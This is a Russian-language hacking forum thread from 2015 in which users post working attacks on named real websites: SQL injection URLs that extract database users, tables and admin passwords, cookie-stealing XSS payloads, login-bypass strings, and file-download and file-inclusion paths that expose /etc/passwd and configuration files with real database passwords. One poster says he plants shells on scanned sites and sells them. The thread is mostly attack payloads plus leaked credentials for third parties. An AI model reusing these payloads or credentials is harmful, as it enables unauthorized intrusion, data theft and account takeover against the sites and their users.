5.5.41-0

PR-5

Индусы


http://www.delreyhotel.com/travel.php?id=999999.9%20union%20all%20select%201, 2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17&ids=7


5.5.42-cll

PR-3


http://www.sendpoints.cn/newsDetail.php?id=999999.9%20union%20all%20select% 201,concat_ws(0x3a,version(),database(),user(),@@v ersion_compile_os),3,4,5,6,7,8,9,10,11,12


5.1.65


http://www.donaldsoneducation.com/store.php?catid=999999.9%20union%20all%20select%20 1,concat_ws(0x3a,version(),database(),user(),@@ver sion_compile_os),3,4


5.0.96-log

PR-3


http://www.gunnars.com/product_grids.php?function=indoor'+and(sElEcT+1+fR oM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x 217e21,user(),0x217e21,version(),0x217e21,database ()))+fRoM+information_schema.tAbLeS+lImIt+0,1),flo or(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRo Up+bY+x)a)+and+'1'='1

5.5.30

PR-5


http://www.pollackassociates.com/blog/blogbycategory_new.php?catid=(sElEcT+1+fRoM(sElEcT +count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,ve rsion(),0x217e21))+fRoM+information_schema.tAbLeS+ lImIt+0,1),floor(rand(0)*2))x+fRoM+information_sch ema.tAbLeS+gRoUp+bY+x)a)


5.5.30

PR-4


http://www.exboyfriendjewelry.com/listings.php?catid=3'+and(sElEcT+1+fRoM(sElEcT+cou nt(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,user() ,0x217e21,version(),0x217e21,database()))+fRoM+inf ormation_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2) )x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+an d+'1'='1

Магазин ювелирных изделий

5.5.41-cll-lve

PR-3

semen6192
25.06.2015, 21:02
↑ (https://antichat.live/posts/3862105/)
Вкусности-приятности

http://www.phy.iitkgp.ernet.in/physics/home/faculty/home.php?id=1'+union+all+select+1,2,3,concat_ws(0x 3a,version(),database(),user(),@@version_compile_o s),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35+and+'0'=' 0

5.5.41-0

PR-5
Индусы

http://www.delreyhotel.com/travel.php?id=999999.9%20union%20all%20select%201, 2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17&ids=7

5.5.42-cll
PR-3

http://www.sendpoints.cn/newsDetail.php?id=999999.9%20union%20all%20select% 201,concat_ws(0x3a,version(),database(),user(),@@v ersion_compile_os),3,4,5,6,7,8,9,10,11,12

5.1.65


http://www.donaldsoneducation.com/store.php?catid=999999.9%20union%20all%20select%20 1,concat_ws(0x3a,version(),database(),user(),@@ver sion_compile_os),3,4

5.0.96-log

PR-3

http://www.gunnars.com/product_grids.php?function=indoor'+and(sElEcT+1+fR oM(sElEcT+count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x 217e21,user(),0x217e21,version(),0x217e21,database ()))+fRoM+information_schema.tAbLeS+lImIt+0,1),flo or(rand(0)*2))x+fRoM+information_schema.tAbLeS+gRo Up+bY+x)a)+and+'1'='1

5.5.30
PR-5

http://www.pollackassociates.com/blog/blogbycategory_new.php?catid=(sElEcT+1+fRoM(sElEcT +count(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,ve rsion(),0x217e21))+fRoM+information_schema.tAbLeS+ lImIt+0,1),floor(rand(0)*2))x+fRoM+information_sch ema.tAbLeS+gRoUp+bY+x)a)

5.5.30
PR-4

http://www.exboyfriendjewelry.com/listings.php?catid=3'+and(sElEcT+1+fRoM(sElEcT+cou nt(*),cOnCaT((sElEcT(sElEcT+cOnCaT(0x217e21,user() ,0x217e21,version(),0x217e21,database()))+fRoM+inf ormation_schema.tAbLeS+lImIt+0,1),floor(rand(0)*2) )x+fRoM+information_schema.tAbLeS+gRoUp+bY+x)a)+an d+'1'='1

Магазин ювелирных изделий
5.5.41-cll-lve

PR-3


В магазине ювелирных изделий(http://www.exboyfriendjewelry.com/index.php), в поле входа пользователей, вписал:

user name: ' or 1=1#

password: ' or 1=1 '#

Зашло под ником: Welcome back ExboyfriendJewelry! походу админ, но точно не знаю.

Filipp
26.06.2015, 13:05
SQL-inj (Blind):


http://rada.te.ua/poll.php?l=2%20AND%203*2*1%3d6%20AND%20913%3d913

Filipp
27.06.2015, 12:20
XSS:


http://www.vsesdelki.lviv.ua/offer-i-id-i-409444-%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28 document.cookie%29%3C/ScRiPt%3E-1-o-2-h-urovnevaja.html



http://www.admir.rv.ua/ru-i-classifieds-i-category-i-audio-video-foto-tehnika-i-what-i-1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E-i-where-i-%D0%A0%D0%BE%D0%B2%D0%BD%D0%BE-i-p.html



http://doski.ua/index.php/">alert(document.cookie)

private_static
27.06.2015, 21:18
http://www.lizzart.ru/catpg.php?k=1&t=2&id=-1689%20UNION%20ALL%20SELECT%20NULL%2CCURRENT_USER% 28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C NULL--

lizzart_mysql@10.1.55.253

Filipp
01.07.2015, 00:32
XSS:


http://inforico.com.ua/my/?mq=1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eale rt%28document.cookie%29%3C/ScRiPt%3E&st=A

Filipp
03.07.2015, 12:10
XSS:


http://don.ua/news/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Filipp
04.07.2015, 11:08
XSS:


http://agronews.ru/forums/index.php?ACTION=FORUM_SUBSCRIBE&FID=14%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eal ert%28document.cookie%29%3C/ScRiPt%3E&PAGE_NAME=list&sessid=69fa9ea1c1f8fa858cb91f13ece82f69

semen6192
04.07.2015, 21:51
XSS:


http://cvp.cce.cornell.edu/search_results.php?q=%3Cscript%3Ealert%28%27antica t.ru%27%29%3C%2Fscript%3E&x=9&y=9

BigBear
05.07.2015, 15:02
Ребят, в целях обучения начинающих пентестеров грамотным определениям - ЖЕЛАТЕЛЬНО (если хотите плюсы) указывать полный тип найденной уязвимости - Blind SQL Injection, Reflected XSS, Arbitrary File Downloading и другие.

Спасибо за внимание.

З.Ы. Модерам - прошу закрепить в начале топика.

EoGeneo
05.07.2015, 15:38
Попробую проканать за пионера

SQL-inj:


http://www.organicindia.com/article.php?articleid=57+/*!50000union*/+distinct+select+1,2,version(),4,database()--+-


Вывод в конце правой колонки.


----


http://www.ipicgroup.com/shopping_centre.php?id=-1+/*!50000union*/+distinct+select+1,database(),3,4,5,6,7,8,9,10,11, 12,version(),14,15,16,17--+-

nikonic
06.07.2015, 00:20
Брауновский университет — один из наиболее престижных частных университетов США, расположенный в городе Провиденсе, штата Род-Айленд.Седьмой из старейших национальных университетов и один из девяти колониальных колледжей.​SQL Injection


http://www.brown.edu/Administration/Auxiliary_Housing/php/show.php?TypeID=999999.9+union+all+select+1,concat _ws(0x3a,version(),database(),user(),@@version_com pile_os)

5.0.95-log

PR- 8

ТИц - 800

Alexa:9к

Трафф - 2.6кк в месяц.

Filipp
06.07.2015, 16:04
CRLF-inj (Результат отображается в heade'ре).


http://www.notomania.ru/cat_view.php?id=%0d%0a%20SomeCustomInjectedHeader: injected_by_ANTICHAT

semen6192
06.07.2015, 20:32
XSS:


http://friendship-bracelets.net/search.php?search_text=%3Cscript%3Ealert%28%271%27 %29%3C%2Fscript%3E

joelblack
07.07.2015, 00:39
target:clanwilliam.info

type: SQL Injection

current user: `clanwi_1@%`

version: 5.5.43-0+DEB7U1-LOG


http://www.clanwilliam.info/index.php?id=-1+union+select+1,version(),3,table_name,5,6,7+from +information_schema.tables+limit+0,1+--+;




target:sergiev.ru

type:Open Redirect


http://www.sergiev.ru/?q=http://ya.ru

Filipp
10.07.2015, 12:00
XSS-reflected:


http://www.blagaya.ru/?s=1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealer t%28document.lastmodified%29%3C/ScRiPt%3E

frank
10.07.2015, 12:16
↑ (https://antichat.live/posts/3866815/)
XSS:


http://www.blagaya.ru/?s=1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealer t%28document.lastmodified%29%3C/ScRiPt%3E



Сканером что ли каким то шел? или фазил?

Filipp
10.07.2015, 19:02
↑ (https://antichat.live/posts/3866819/)
Сканером что ли каким то шел? или фазил?


Да, сканером) Лень что-то менять, я сразу как что то нахожу сюда сливаю.

frank
10.07.2015, 19:19
↑ (https://antichat.live/posts/3866957/)
Да, сканером) Лень что-то менять, я сразу как что то нахожу сюда сливаю.


Ну не знаю . Это конечно мое мнение, но в чем профит то? Когда сканер идет по доркам и ищет. Мне кажется опыта и знаний это не даст.

Кстати, в вашем примере ксс очень условная.

1. Она есть даже при обычной записи alert(1)

2. Сработает только на огнелисе без всяких там noscript. Свежие версии ослика и хрома модифицируют запрос встроенной защитой от ксс. И алерта уже не будет.

EoGeneo
10.07.2015, 21:42
↑ (https://antichat.live/posts/3866957/)
Да, сканером) Лень что-то менять, я сразу как что то нахожу сюда сливаю.


Да и вообще, какой прикол по РУ работать, давай по USA лучше

Filipp
10.07.2015, 23:21
↑ (https://antichat.live/posts/3866963/)
Ну не знаю . Это конечно мое мнение, но в чем профит то? Когда сканер идет по доркам и ищет. Мне кажется опыта и знаний это не даст.
Кстати, в вашем примере ксс очень условная.
1. Она есть даже при обычной записи alert(1)
2. Сработает только на огнелисе без всяких там noscript. Свежие версии ослика и хрома модифицируют запрос встроенной защитой от ксс. И алерта уже не будет.


Сканер влепил так, я запрос скопировал и запостил. А профит прост как пять пальцев, выбираю сайты, сканю их, в некоторые заливаю шеллы и продаю. А где нет ничего серьезного, там XSS или SQLi от которых толку особо нет я закидываю сюда) Тут они кому то пригодяться да и я репы получу.


↑ (https://antichat.live/posts/3867003/)
Да и вообще, какой прикол по РУ работать, давай по USA лучше


Шеллы покупают, не уверен что кто-то будет брать USA шелл, покрайней мере, надо будет искать покупателя и скорее всего он не надежный. Конечно есть гарант для таких дел, но я все же придерживаюсь классики)

Filipp
11.07.2015, 22:11
XSS-reflected:


http://volia.com/ukr/subscribe/order/?pro=cine_plus_vip%22%3E%3Cscript%3Ealert%28docume nt.cookie%29%3C/script%3E


HTTP Parametr Pollution (Original Link):


http://www.moscvettorg.ru/english/collection/vse-bukety/product/otkrytka-vintazhnaya-011%26n950821%3dv972549?TAGS=vse-bukety&CODE=otkrytka-vintazhnaya-011&n950821=v972549

Exploit:


http://www.moscvettorg.ru/english/collection/vse-bukety/product/otkrytka-vintazhnaya-011%26n950821%3dv972549


CRLF-inj:


POST mh-proxy.ru/blog/action.php
POST-DATA: id=%0d%0a%20SomeCustomInjectedHeader:injected_by_A NTICHAT



http://guru.ua/
Cookie: user_set_city=%0D%0A%20SomeCustomInjectedHeader:in jected_by_ANTICHAT



POST topclub.ua/
POST DATA: ACT=45&business=1&comment=1&email=sample%40email.tst&form_name=%d0%97%d0%b0%d1%8f%d0%b2%d0%ba%d0%b0%20% d0%bd%d0%b0%20%d0%bf%d1%80%d0%be%d0%b4%d0%b2%d0%b8 %d0%b6%d0%b5%d0%bd%d0%b8%d0%b5%20%d0%b7%d0%b0%d0%b 2%d0%b5%d0%b4%d0%b5%d0%bd%d0%b8%d1%8f&name=hsmryamv&params_id=81288&phone=555-666-0606&position=1&redirect_on_duplicate=&RET=http://topclub.ua/pages/business/%26utm_campaign%3dadd_venue_sub_nav%26utm_medium%3 dpages_business%26utm_source%3dtopclub_vn&return=%0d%0a%20SomeCustomInjectedHeader:injected_ by_ANTICHAT&site_id=1&status=open&submit=%d0%9e%d1%82%d0%bf%d1%80%d0%b0%d0%b2%d0%b8% d1%82%d1%8c%20%d0%b7%d0%b0%d1%8f%d0%b2%d0%ba%d1%83&town=1&URI=pages/business/%26utm_campaign%3dadd_venue_sub_nav%26utm_medium%3 dpages_business%26utm_source%3dtopclub_vn&XID=

Filipp
26.07.2015, 22:30
XSS:


http://lifetosex.com.ua/tags?tags=%25D0%25A1%25D0%25B5%25D0%25BA%25D1%2581 %2520-%2520%25D0%259A%25D0%25BB%25D0%25B0%25D1%2581%25D1 %2581%25D0%25B8%25D0%25BA%25D0%25B0%3Cvideo%3E%3Cs ource%20onerror%3d%22javascript:alert%281%29%22%3E&tag_list_start=36

Filipp
27.07.2015, 16:49
XSS-reflected:


http://otsos.info/aubox.php?callback=%27%22%28%29%26%25%3Cacx%3E%3CS cRiPt%20%3Eprompt%28%22For%20Antichat%22%29%3C/ScRiPt%3E&_=1438000881938

XSS-reflected:


http://kofe-spb.ru/feedback.php?complaint=170%3C/textarea%3E%3CScRiPt%20%3Eprompt%28%22Antichat%22% 29%3C/ScRiPt%3E

XSS-reflected:


http://sexytales.org/stories/drama/?ecid[]=42&necid[]=42&order_by=-part_count%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20% 3Eprompt%28%22Antichat%22%29%3C/ScRiPt%3E&period=&per_page=

ocheretko
28.07.2015, 10:30
интересная XSS:


http://www.fas.harvard.edu/antichat=%3Cscript%3Ealert%28/antichat/%29;%3C/script%3E%00

Filipp
29.07.2015, 11:34
XSS-reflected:


http://sonnik.orakul.ua/freyd/ch%3Cvideo%3E%3Csource%20onerror%3d%22javascript:p rompt%281%29%22%3E/

joelblack
04.08.2015, 22:47
target: http://tstu.ru

type: AFD


http://tstu.ru/video/download_img.php?url=/etc/passwd


исправил

blud_niy
06.08.2015, 23:34
SQL-inj (Blind):


http://www.isihac.net/news-article.php?id=-47%27+union+select+1,2,3,4,password,6,7,8+from+use rs+limit+0,1+--+

private_static
07.08.2015, 00:24
XSS


http://www.kadrovik.ru/prc.php?year=2015">alert("xss");

SQL inject


http://orgpoisk.ru/region/id/-8%20union%20select%201,DATABASE%28%29,CURRENT_USER %28%29,4,5,6,7

user:huntfishru_orpsk@localhost

db:huntfishru_orpsk

blud_niy
07.08.2015, 10:08
SQL inject


http://www.bookpourghaz.ir/post.php?id=-suHWoFO3ScI_EQUALS_'+union+select+1,2,3,user(),5,6 ,7,8+--+



http://www.seroqadir.com/read.php?id=-2323'+union+select+1,2,3,user(),5,6+--+

SQL inject


http://library.phcsuphan.ac.th/webpage.contentread.php?id=-6'+union+select+1,user(),3,4,5+--+



http://www.malnaditimudigere.com/view_post.php?id=-2'+union+select+1,2,3,user(),5,6,7,8,9+--+



http://www.100devok.ru/view_post.php?id=-125'+union+select+1,2,3,4,5,user(),7,8,9,10,11,12, 13,14+--+

joelblack
10.08.2015, 17:21
target:http://www.newpushkino.ru/

type:XSS Reflected

Строка поиска


alert('XSS');

blud_niy
12.08.2015, 15:09
Site: http://www.hungatecottages.co.uk

Уязвимость: SQL Injection

Эксплоит:


http://www.hungatecottages.co.uk/blog-post.php?id=-55'+union+select+1,username,3,4,5,password,7,8,9+f rom+adminusers+limit+0,1+--+

Site: http://www.brandnmc.com

Уязвимость: SQL Injection

Эксплоит:


http://www.brandnmc.com/view-product.php?id=-45'+union+select+1,2,version(),4,5,6,7,8+--+

Site: http://agrovolyn.com

Уязвимость: SQL Injection

Эксплоит:


http://agrovolyn.com/news.php?id=-657'+union+select+1,version(),table_name,4,5,6,use r()+from+information_schema.tables+limit+3,1+--+

Site: http://www.siempreenplay.com

Уязвимость: SQL Injection

Эксплоит:


http://www.siempreenplay.com/EstudiosCientificos_post.php?id=-16'+union+select+1,2,3,4,5,table_name,7,8,9,10+fro m+information_schema.tables+limit+3,1+--+

Site: http://www.fivestarhomefoods.com

Уязвимость: SQL Injection

Эксплоит:


http://www.fivestarhomefoods.com/view_product.php?id=-18'+union+select+1,column_name+from+information_sc hema.columns+where+table_name=%27users%27+limit+03 ,1+--+

joelblack
13.08.2015, 01:36
target:http://www.goravia.ru/

type:XSS Reflected

http://www.goravia.ru/authorization/

POST:


pass=adm&backurl=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3B% 3C%2fscript%3E&member=1&user=adm

target:https://www.aviba.ru/

type:XSS Reflected

https://www.aviba.ru/

POST:


locate_start=1&tudaobratno=%3E%3Cscript%3Ealert%28%27hello%27%29% 3B%3C%2fscript%3E&polet_class=E&f_from=%D0%9E%D1%82%D0%BA%D1%83%D0%B4%D0%B0&f_to=%D0%9A%D1%83%D0%B4%D0%B0&f_date2=%D0%9E%D0%B1%D1%80%D0%B0%D1%82%D0%BD%D0%BE&f_date1=%D0%94%D0%B0%D1%82%D0%B0

Filipp
13.08.2015, 11:06
Heartbleed:


https://avon-ekb.ru

joelblack
13.08.2015, 14:27
target:http://www.tez-tour.com/

type:XSS Reflected


http://www.tez-tour.com/captcha/index.htm?hotelTypeBetter=1&ref=%22%3E%3Cscript%3Ealert%28%27hello,tez%27%29%3 B%3C%2Fscript%3E&regionId=

target:http://www.pstour.ru

type:SQL Injection


login:admin password:' or '1'='1

MDen1s
14.08.2015, 17:27
XSS в поле поиска. Только не знаю какая:Reflected или DOM-based

http://voices.iit.edu/

alert('XSS') (http://voices.iit.edu/)

DDShadoww
14.08.2015, 20:41
target:http://dazo.gov.ua

Type:XSS Reflected



http://dazo.gov.ua/index.php?id=">

sander
15.08.2015, 18:28
target:https://dota2.net

Type:XSS Reflected

https://dota2.net/players/?st=">alert() (https://dota2.net/players/?st=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E)

target:csgo.tm

Type:XSS Reflected

https://csgo.tm/support/

Описание : Переходим по линке и там где надо писать сообщение в саппорт пишем наш скрипт,я пишу ">alert(),дальше нажимаем создать тикет и вуаля(Нужно быть авторизованным в Steam . ) .

hahanovB
16.08.2015, 17:24
Target: http://www.mercerhotel.com/

Type: Arbitrary File Download

http://www.mercerhotel.com/forceDownload.php?file=../../../../../etc/passwd

www.mercerhotel.com/forceDownload.php?file=phpclasses/config.php (http://www.mercerhotel.com/forceDownload.php?file=phpclasses/config.php)


// $cfg['db']['host'] ="internal-db.s29207.gridserver.com";
// $cfg['db']['user'] ="db29207_hotelsab";
// $cfg['db']['password'] ="L'Tbh{))17";
// $cfg['db']['name']="db29207_mercerhotel";

private_static
16.08.2015, 18:32
Error Based SQL inject


http://hentai-x.ru/anime.php?id=3%20AND%20%28SELECT%201%20FROM%28SELE CT%20COUNT%28*%29,CONCAT%28%28MID%28%28IFNULL%28CA ST%28CURRENT_USER%28%29%20AS%20CHAR%29,0x20%29%29, 1,50%29%29,FLOOR%28RAND%280%29*2%29%29x%20FROM%20I NFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x% 29lol%29

srv40129_ignilx@localhost

hahanovB
16.08.2015, 20:53
Type: Arbitrary File Download

Target: avalon-school.co.uk

Vulnerable: http://avalon-school.co.uk/forcedownload.php?file=../wp-config.php


define('DB_NAME','avalon_school');

/** MySQL database username */
define('DB_USER','avalon-school');

/** MySQL database password */
define('DB_PASSWORD','WEB4374dnfjv');

/** MySQL hostname */
define('DB_HOST','localhost');

Target: trackcars4hire.co.uk

Vulnerable: http://avalon-school.co.uk/forcedow.../../home/trackcars4hire/public_html/index.php (http://avalon-school.co.uk/forcedownload.php?file=../../../../home/trackcars4hire/public_html/index.php)

Target: tankers-r-us.co.uk

Vulnerable: http://avalon-school.co.uk/forcedow...../../home/tankers-r-us/public_html/index.php (http://avalon-school.co.uk/forcedownload.php?file=../../../../home/tankers-r-us/public_html/index.php)

Target: brighterchoices.co.uk

Vulnerable: http://avalon-school.co.uk/forcedow...../home/brighterchoices/public_html/index.php (http://avalon-school.co.uk/forcedownload.php?file=../../../../home/brighterchoices/public_html/index.php)

Target: theknutsfordspa.co.uk

Vulnerable: http://avalon-school.co.uk/forcedow...../home/theknutsfordspa/public_html/index.php (http://avalon-school.co.uk/forcedownload.php?file=../../../../home/theknutsfordspa/public_html/index.php)

Target: rhinoequipment.com.au

Vulnerable: http://avalon-school.co.uk/forcedow.../../home/rhinoequipment/public_html/index.php (http://avalon-school.co.uk/forcedownload.php?file=../../../../home/rhinoequipment/public_html/index.php)

Target: korusgroup.co.uk

Vulnerable: http://avalon-school.co.uk/forcedownload.php?file=../../../../home/korusgroup/public_html/index.php

Target: dentalacademy.co.uk

Vulnerable: http://avalon-school.co.uk/forcedow.../../home/dentalacademy/public_html/index.html (http://avalon-school.co.uk/forcedownload.php?file=../../../../home/dentalacademy/public_html/index.html)

Pe4aJlb
18.08.2015, 11:44
/#

Яндекс тИЦ 400 pr 5

joelblack
20.08.2015, 00:18
target: http://www.kt.kz

type: XSS Reflected


http://www.kt.kz/rus/search/?text=%22%3E%3Cscript%3Ealert%28%27Hello%27%29%3C% 2Fscript%3E


target: http://www.yerkramas.org/advancedsearch

type: XSS Reflected

title:


">alert('Hello')

target: http://www.inet.az

type: XSS Reflected

Строка поиска:


">alert('Hello')

target: http://www.yenixeber.com

type: XSS Reflected

Строка поиска:


">alert('Hello')

target: https://stat.internet.su/

type:SQL Injection

Имя пользователя,Пароль:


' OR 'a'='a

w0rm_
20.08.2015, 02:07
[колор=рэд][сайз=млн]ЯНДЕКС ТИЦ 100500 !!!![/колор][/сайз]


_ttps://drive.google.com/file/d/0B0ox2xf_0TMjWVNHRWlBTU9sSWs/view

hahanovB
20.08.2015, 17:14
Type: Arbitrary File Download

Target: 14isppgconvention.com

Vulnerable: http://www.14isppgconvention.com/forcedownload.php?file=

1. http://www.14isppgconvention.com/forcedownload.php?file=admin/index.php (GET)

Получаем:


if($_SERVER['REQUEST_METHOD']=='POST'){
if($_POST['username']=='14isppg'&&$_POST['password']=='14isppg@admin'){
$_SESSION['user']=1;
header('Location:home.php');
exit;

Логин: 14isppg

Пароль: 14isppg@admin

2. Входим http://www.14isppgconvention.com/admin/

Получаем: http://www.14isppgconvention.com/admin/users.php?export=users

3. http://www.14isppgconvention.com/forcedownload.php?file=admin/users.php (GET)

Находим:


mysql_connect("peterjacob82.powwebmysql.com","14isppg","14isppgS20") or die(mysql_error());

mysql_select_db("14isppg") or die(mysql_error())


Находим:


$FOO_USERNAME="39ispnc";
$FOO_PASSWORD="n0f5qkqjba";
$FOO_SENDERID="ISPPGM";
$FOO_PRIORITY="11";

$urltopost="http://bulksms.smslite.co.in/xmlapi.php";

hahanovB
20.08.2015, 21:02
Type: Arbitrary File Download

Target: tennismatchpoint.net

Vulnerable: www.tennismatchpoint.net/inc/forceDownload.php?file=../admin/index.php (http://www.tennismatchpoint.net/inc/forceDownload.php?file=../admin/index.php)


$PASSWORD='cesenatennis';
if ($PASSWORD==$_POST['password'] &&$_POST['username'] =='admin'){

Логин: admin

Пароль: cesenatennis

hahanovB
20.08.2015, 21:21
Type: Arbitrary File Download

Target: requisur.com

Vulnerable: www.requisur.com/pdf/forcedownload.php?file=../configuration.php (http://www.requisur.com/pdf/forcedownload.php?file=../configuration.php)


var$dbtype='mysqli';
var$host='localhost';
var$user='gtbaotmh_requisu';
var$db='gtbaotmh_requisu';
var$dbprefix='kxlo_';
var$password='Ry&f#4d*4$0vYk';

hahanovB
22.08.2015, 18:00
Type: Local File Inclusion

Target: com-onlive.tv

Vulnerable: http://www.com-onlive.tv/wp-content/plugins/robotcpa//f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk

Type: Local File Inclusion

Target: garcinia.com-see.tv

Vulnerable: http://garcinia.com-see.tv/wp-content/plugins/robotcpa//f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk

Type: Local File Inclusion

Target: garcinia.com-see.tv

Vulnerable: http://www.truhlarstvi-rozkos.cz/fotogalerie.php?id=../../../../../../../../../../etc/passwd (http://www.truhlarstvi-rozkos.cz/fotogalerie.php?id=../../../../../../../../../../etc/passwd%00)

sander
23.08.2015, 12:26
target:ykt.ru

Type:XSS-Reflected

Заходим сюда по линке

ykt.ru/search/image?q=&t=0&s=0&sid=14&ws=6941337%22%27&we=

В поиске вводим ">alert("WX")

И видим XSS .

sander
23.08.2015, 14:49
target:hochu.ua

Type : XSS-Reflected

Описание :

В поиске вводим : ">alert("WX")

Готовая линка : http://hochu.ua/search/?q=">alert("WX") (http://hochu.ua/search/?q=%22%3E%3Cscript%3Ealert%28%22WX%22%29%3C%2Fscri pt%3E)

joelblack
24.08.2015, 19:21
target: http://www.globexbank.ru/

type: XSS Reflected

Курс обмена валют:


">alert('Hello')

hahanovB
24.08.2015, 23:19
Type:SQL Injection

Target:intergips.com.ua

Vulnerable:


http://intergips.com.ua/index.php?item_id=-3445%27%20UNION%20ALL%20SELECT%20CONCAT%280x717a78 7a71%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20C HAR%29%2C0x20%29%2C0x71786b7171%29--%20

w0rm_
26.08.2015, 23:19
Type: SQL Injection

Target: *.mystart.com (212 alexa rang)

PoC:


_ttp://apps2.mystart.com/ui/site/index.php?tb=vmndtxtb&cid=-2+union+select+1,user(),3,4+from+mysql.user+--
File_priv=Y

kingbeef
27.08.2015, 19:52
↑ (https://antichat.live/posts/3884970/)
Spoiler: admin and pass
roselynef@vmn.net (mailto:roselynef@vmn.net)
:adminlox
admin link : apps2.mystart.com/admin/
Добавил XSS : apps2.mystart.com/ui/site/index.php?tb='alert('SIXSS')
кек xss с sql норм так .


SIXSS

http://apps2.mystart.com/ui/site/in...27293c2f7363726970743e,3,4+from+mysql.user+-- (http://apps2.mystart.com/ui/site/index.php?tb=vmndtxtb&cid=-2+union+select+1,0x3c7363726970743e616c65727428275 34958535327293c2f7363726970743e,3,4+from+mysql.use r+--)

sander
29.08.2015, 08:35
Target:http://www.ecco-shoes.ru/search

Type:XSS-Reflected

Описание: Переходим в любой раздел "Для мужчин/женщин" . Ищем поиск по артиклу и вбиваем в оба поля .


">alert('Hello') .

а также


www.ecco-shoes.ru/shops/?country=UNION SELECT 1,2,3,'alert('SIXSS')',5,6 --&region=Архангельская+область&town=Архангельск



Да и вообще на этом сайте много XSS .

faza02
29.08.2015, 12:02
↑ (https://antichat.live/posts/3885456/)
Target:http://www.ecco-shoes.ru/search

Type:XSS-Reflected

Описание: Переходим в любой раздел "Для мужчин/женщин" . Ищем поиск по артиклу и вбиваем в оба поля .

">alert('Hello') .

а также


www.ecco-shoes.ru/shops/?country=UNION SELECT 1,2,3,'alert('SIXSS')',5,6 --&region=Архангельская+область&town=Архангельск


Да и вообще на этом сайте много XSS .


последнее это что?

ocheretko
29.08.2015, 14:24
Это похоже просто на копипаст откудато.

Кстати этот сайт бомбили еще в 2008 году https://older.antichat.net/showpost.php?p=960320&postcount=273

joelblack
29.08.2015, 15:13
target: http://www.kred-bank.ru

type: XSS Reflected

Строка поиска:


">alert('Hello')

sander
29.08.2015, 16:50
target : http://6dosug777.com/en/spb/forum/o...u-po-karmanu-raznyie-tsenovyie-kategor.9.html (http://6dosug777.com/en/spb/forum/onlajn-magazin-prostitutok-7-921-941-08-87-podberi-sebe-devushku-po-karmanu-raznyie-tsenovyie-kategor.9.html)

Type:XSS-Reflected


'alert('SIXSS')


Там в самом внизу комментарии можно оставлять без всяких заполнений .

Сорри,я там нафлудил чуток) .

Скрипт можете вставить свой,я чисто для примера другой написал .

sander
29.08.2015, 17:07
↑ (https://antichat.live/posts/3885527/)
Это похоже просто на копипаст откудато.
Кстати этот сайт бомбили еще в 2008 году
https://older.antichat.net/showpost.php?p=960320&postcount=273


Ну может скопипастил,но не специально,т.к я просто рыскал по гуглу .

А последнее это та же XSS,но на крайняк может понадобиться .

joelblack
29.08.2015, 17:30
target: http://sobinbank.ru/

type: Open Redirect


http://sobinbank.ru/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=http://ya.ru

target: http://sinko-bank.ru

type: XSS Reflected

Строка поиска:


">alert('Hello')

DDShadoww
29.08.2015, 18:13
target:http://halykbank.kz

type: XSS-Reflected


http://halykbank.kz/ru/search?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscrip t%3E

w0rm_
30.08.2015, 11:30
Target:home.singtel.com

Type: SQL injection


http://home.singtel.com/include/tell_a_friend_process.asp

POST:
segment_id_=awdpojawdpj&url_=awdz&page_title_=awd&email_sent_=xapt0x@xapk.ru' and 1=(select top 1 table_name from information_schema.tables)--&email_from_=aaw221&remark_=awdawd22&x=9&y=5

singtelsgp
singtelsgp-stag
miotv-stag
singtelmiotvstaffplan
miotv-prd
STSGP09-stag
STSGP09
ClickCounter
STMIO-STAG
STMIO
uefa-phase1
uefa-prod
uefa-stag
STSGP2011-stag-KIV
STSGP2011-KIV
race2011-stag
race2011-prod
singtelcorp2010new
yog
YOGWEBCAST
STCON
STBIZ
singtel_3
singtel_3_Monday1
eids_sso
accelerate
browdb
faceapp-stag
faceapp-prod
distis_agent
miotv400k_prd

DDShadoww
30.08.2015, 13:48
target:3dnews.ru (http://www.3dnews.ru/)

type: DOM Based XSS

В поля поиска


alert(1)

sander
30.08.2015, 17:39
target:subscribe.ru

type:XSS-Reflected

Поиск :


alert('XSS')




Кто-то уже до меня нашёл :Р .

DDShadoww
30.08.2015, 21:21
XSS на мобильной версии сайта KFC

target:m.kfc.ru/career-vacancies/member

type: XSS-Reflected

В поля Фамилия, имя вводим


">alert("XSS")

и так же в поле Мобильный телефон

DDShadoww
30.08.2015, 22:12
BurgerKing

target: burgerking.ru

type: XSS-Reflected

В поля поиска


">alert(1)

sander
02.09.2015, 14:19
Target: _ttp://www.edelws.ru (http://www.edelws.ru)

Type : XSS-Reflected(вбивается под поисковик .)


">alert("WH")

psihoz26
02.09.2015, 14:38
↑ (https://antichat.live/posts/3885795/)
target:3dnews.ru (http://www.3dnews.ru/)

type: XSS-Reflected
В поля поиска


alert(1)



это DOM based XSS

работает даже в хроме


http://www.3dnews.ru/search/#query=alert(1)&sdate=&edate=&intitle=0

BabaDook
02.09.2015, 14:44
↑ (https://antichat.live/posts/3886787/)
